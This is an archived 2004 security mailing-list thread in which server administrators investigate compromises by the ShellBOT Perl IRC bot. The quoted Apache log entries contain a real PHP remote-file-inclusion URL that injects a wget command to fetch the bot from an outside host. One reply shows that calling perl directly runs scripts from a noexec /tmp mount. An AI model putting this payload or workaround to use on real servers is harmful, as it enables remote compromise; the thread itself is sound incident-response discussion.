Re: Systems compromised with ShellBOT perl script - part 2
From: Meder Kydyraliev (meder_at_areopag.net)
Date: 10/20/04
- Previous message: security_at_kemhosting.com: "re: Systems compromised with ShellBOT perl script - part 2"
- In reply to: security_at_kemhosting.com: "re: Systems compromised with ShellBOT perl script - part 2"
- Next in thread: Dave: "Re: Systems compromised with ShellBOT perl script - part 2"
- Maybe reply: Dave: "Re: Systems compromised with ShellBOT perl script - part 2"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Thu, 21 Oct 2004 01:15:37 +0600 To: security@kemhosting.com
Here, have a look here:
[meder@beastie /]$mount|grep tmp
/dev/ad0s3d on /tmp (ufs, local, noexec, nosuid, soft-updates)
[meder@beastie /]$cat /tmp/test.pl
#!/usr/bin/perl
print "Hello world\n";
[meder@beastie /]$/tmp/test.pl
su: /tmp/test.pl: /usr/bin/perl: bad interpreter: Permission denied
[meder@beastie /]$perl /tmp/test.pl
Hello world
[meder@beastie /]$
On Wed, Oct 20, 2004 at 12:04:36AM -0500, security@kemhosting.com wrote:
> This thread is a couple months old, but I'm having issues with this hack, found
> it in the archives and thought it'd be helpful if I 'resusitated' it. See
> bottom of email for rest of thread.
>
> Today, hackers used the ShellBOT perl script to bring down Apache and start up
> their IRC listener. They (somehow) copied it into /tmp and executed it. This
> confuses me because I have my /tmp directory mounted rw,noexec,nosuid. Does
> Perl somehow bypass this?
>
> While the script was running, I ran lsof and found that it had recursively
> accessed all my (virtual host) httpd logs (probably in an attempt to delete
> it's tracks = the reason I can't see how they copied the script into /tmp)
> which are owned by root. this is also confusing since the process the script
> spawned was owned by user apache.
>
> Some info on my box:
> Redhat ES kernel 2.4.21-9.0.1.ELsmp
> httpd-2.0.46-32.ent
> php-4.3.2-11.ent
>
> Anyone have any ideas on how this can happen? Mainly the executing of a script
> on a noexec mount! Obviously I'm not a guru, so it's probably something simple
> - so please, share!
>
> Thanks,
> Ed
>
>
>
> Kirby Angell wrote:
>
> > Yesterday we noticed a funny looking Apache log entry. It contained:
> >
> >
> http://www.DOMAIN.com/index.php?id=http://farpador.ubbi.com.br/cmd.txt?&cmd=http://farpador.ubbi.com.br/cmd.txt?&cmd=cd%20/tmp;wget%20http://members.lycos.co.uk/lotsen6k/.egg2
> >
> > in the Referer entry. The actual HTTP request was inocuous, but the
> > Referer entry is not. I have been in contact with the owner of the
> > computer that was the apparent target of the attack and he reports that
> > the "index.php" page properly sanitizes its variables to keep this from
> > working.
> >
> > The attack attempts to trick the server into downloading and running the
> > given perl script, ".egg2" in this case. I retrieved a copy of that
> > script and found it configured to log into an IRC server
> > (irc.mzima.net:6667). Once the script is logged in, it joins the
> > channel "#datalink" and then waits for private messages from its
> > handler. The script can perform limited portscans, denial of service
> > attacks, and can run shell commands as whatever user the compromised web
> > server was running as. The script hides its identity by changing it
> > process name to "[httpd]" so it looks like one of many server threads.
> >
> > I logged into the IRC server and joined the channel to find 62
> > compromised systems listening. Unfortunately I was noticed and now the
> > channel is by invitation only. I have notified as many of the
> > administrators for those systems as could be identified from whois
> > records. I have also notified the operators of the IRC server.
> >
> > The IP address of the system that set off the original inquiry is
> > 63.227.76.25. The admin of one of the compromised boxes has found that
> > same IP address involved in their attack too. The Apache log entries
> > from their system look like this:
> >
> > 63.227.76.25 - - [30/Aug/2004:23:38:57 -0400] "GET /popwin.js HTTP/1.0"
> > 200 195
> >
> "http://www.domain.com/aboutus/index.php?page=http://farpador.ubbi.com.br/cmd.txt?&cmd=http://farpador.ubbi.com.br/cmd.txt?&cmd=cd%20/tmp;wget%20http://members.lycos.co.uk/lotsen6k/.egg2"
> > "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040626
> > Firefox/0.9.1"
> > 63.227.76.25 - - [30/Aug/2004:23:38:57 -0400] "GET
> > /images/l2_thinkInsideBox.gif HTTP/1.0" 200 1711
> >
> "http://www.domain.com/aboutus/index.php?page=http://farpador.ubbi.com.br/cmd.txt?&cmd=http://farpador.ubbi.com.br/cmd.txt?&cmd=cd%20/tmp;wget%20http://members.lycos.co.uk/lotsen6k/.egg2"
> > "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040626
> > Firefox/0.9.1"
> > 63.227.76.25 - - [30/Aug/2004:23:38:57 -0400] "GET /images/l2topbox.gif
> > HTTP/1.0" 200 2576
> >
> "http://www.domain.com/aboutus/index.php?page=http://farpador.ubbi.com.br/cmd.txt?&cmd=http://farpador.ubbi.com.br/cmd.txt?&cmd=cd%20/tmp;wget%20http://members.lycos.co.uk/lotsen6k/.egg2"
> > "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040626
> > Firefox/0.9.1"
> >
> > I would like to find if he used other IPs, but so far I've only had a
> > few responses from admins of the compromised systems. All who responded
> > were happy to provide log entries though.
> >
> > This sort of script shouldn't be terribly difficult to spot. A "netstat
> > ~ -pan | grep 6667" will show its presence while running. Unless some
> > other compromise is used in conjunction with the script, the cracker
> > will not be able to install any sort of rootkit to hide the script's
> > presence.
> >
> > --
> > Thank you,
> >
> > Kirby Angell
> > Get notified anytime your website goes down!
> > http://www.alertra.com
> > key: 9004F4C0
> > fingerprint: DD7E E88D 7F50 2A1E 229D 836A DB5B A751 9004 F4C0
>
> ----------------------------------------------------------------
> This message was sent using IMP, the Internet Messaging Program.
- Previous message: security_at_kemhosting.com: "re: Systems compromised with ShellBOT perl script - part 2"
- In reply to: security_at_kemhosting.com: "re: Systems compromised with ShellBOT perl script - part 2"
- Next in thread: Dave: "Re: Systems compromised with ShellBOT perl script - part 2"
- Maybe reply: Dave: "Re: Systems compromised with ShellBOT perl script - part 2"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
